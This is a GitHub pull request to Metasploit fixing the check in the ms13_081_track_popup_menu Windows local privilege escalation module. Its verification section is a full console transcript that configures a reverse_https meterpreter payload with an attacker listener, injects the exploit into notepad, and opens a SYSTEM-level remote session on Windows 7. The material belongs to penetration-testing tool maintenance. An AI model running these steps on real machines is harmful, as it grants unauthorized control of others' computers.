Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix ms13_081_track_popup_menu #6923

Merged
merged 1 commit into from May 31, 2016
Merged

Fix ms13_081_track_popup_menu #6923

merged 1 commit into from May 31, 2016

Conversation

ssyy201506
Copy link
Contributor

@ssyy201506 ssyy201506 commented May 30, 2016
edited by wchen-r7

Fix the exploit check.
Issue number is not assigned.

Verification

  • Create a meterpreter session as a non-privileged user.
  • use exploit/windows/local/ms13_081_track_popup_menu

Windows7 SP1 x86

msf > sessions

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  PC-VX57UA9\user @ PC-VX57UA9  10.0.1.81:8080 -> 10.0.1.101:49223 (10.0.1.101)

msf > use exploit/windows/local/ms13_081_track_popup_menu
msf exploit(ms13_081_track_popup_menu) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(ms13_081_track_popup_menu) > set LHOST 10.0.1.81
LHOST => 10.0.1.81
msf exploit(ms13_081_track_popup_menu) > set LPORT 443
LPORT => 443
msf exploit(ms13_081_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms13_081_track_popup_menu) > show options

Module options (exploit/windows/local/ms13_081_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.1.81        yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP0/SP1


msf exploit(ms13_081_track_popup_menu) > exploit

[*] Started HTTPS reverse handler on https://10.0.1.81:443/
[*] Launching notepad to host the exploit...
[+] Process 4028 launched.
[*] Reflectively injecting the exploit DLL into 4028...
[*] Injecting exploit into 4028...
[*] Exploit injected. Injecting payload into 4028...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] https://10.0.1.81:443/ handling request from 10.0.1.101; (UUID: qefku3fl) Staging Native payload...
[*] Meterpreter session 2 opened (10.0.1.81:443 -> 10.0.1.101:49225) at 2016-05-27 17:24:22 +0900

meterpreter > sysinfo
Computer        : PC-VX57UA9
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@wchen-r7 wchen-r7 self-assigned this May 31, 2016
@wchen-r7
Copy link
Contributor

yup, good catch.

@wchen-r7 wchen-r7 merged commit 31bbcfc into rapid7:master May 31, 2016
wchen-r7 added a commit that referenced this pull request May 31, 2016
@wchen-r7
Land #6923, Check the correct check code for ms13_081_track_popup_menu
fb67856
@ssyy201506 ssyy201506 deleted the fix_ms13_081_track_popup_menu branch May 31, 2016 23:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
feature
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@ssyy201506 @wchen-r7